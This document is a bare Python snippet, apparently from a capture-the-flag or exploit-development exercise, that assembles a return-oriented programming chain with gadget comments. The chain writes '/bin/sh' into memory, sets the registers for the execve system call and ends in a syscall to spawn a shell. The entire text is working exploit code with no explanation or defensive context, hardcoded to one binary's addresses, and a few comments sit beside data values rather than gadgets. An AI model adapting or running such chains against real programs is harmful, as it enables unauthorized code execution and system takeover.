payload = p64(0x433ca7)
#0x0000000000433ca7: pop rax; ret; 
payload += p64(0x433ca7)+p64(0x422929)
# 0x0000000000422929: pop rdi; jmp rax; 
payload += p64(0x43d048)
# 0x0000000000433ca7: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40a6e2)
# 0x000000000040a6e2: mov qword ptr [rdi + 0x28], rax; ret; 
payload += p64(0x4107f5)
# 0x00000000004107f5: xor esi, esi; mov rax, rsi; ret; 
payload += p64(0x433ca7)
# 0x0000000000433ca7: pop rax; ret; 
payload += p64(0x433ca7)+p64(0x422929)
# 0x0000000000422929: pop rdi; jmp rax; 
payload += p64(0x43d1f0)
# 0x0000000000433ca7: pop rax; ret; 
payload += p64(0x1)+p64(0x40f746)
# 0x000000000040f746: lea rdx, [rax - 1]; mov rax, qword ptr [rdi + 0x10]; sub rax, rdx; ret; 
payload += p64(0x433ca7)
# 0x0000000000433ca7: pop rax; ret; 
payload += p64(0x433ca7)+p64(0x422929)
# 0x0000000000422929: pop rdi; jmp rax; 
payload += p64(0x43d070)
# 0x0000000000433ca7: pop rax; ret; 
payload += p64(0x3b)+p64(0x428a6b)
# 0x0000000000428a6b: syscall; 
payload += b''
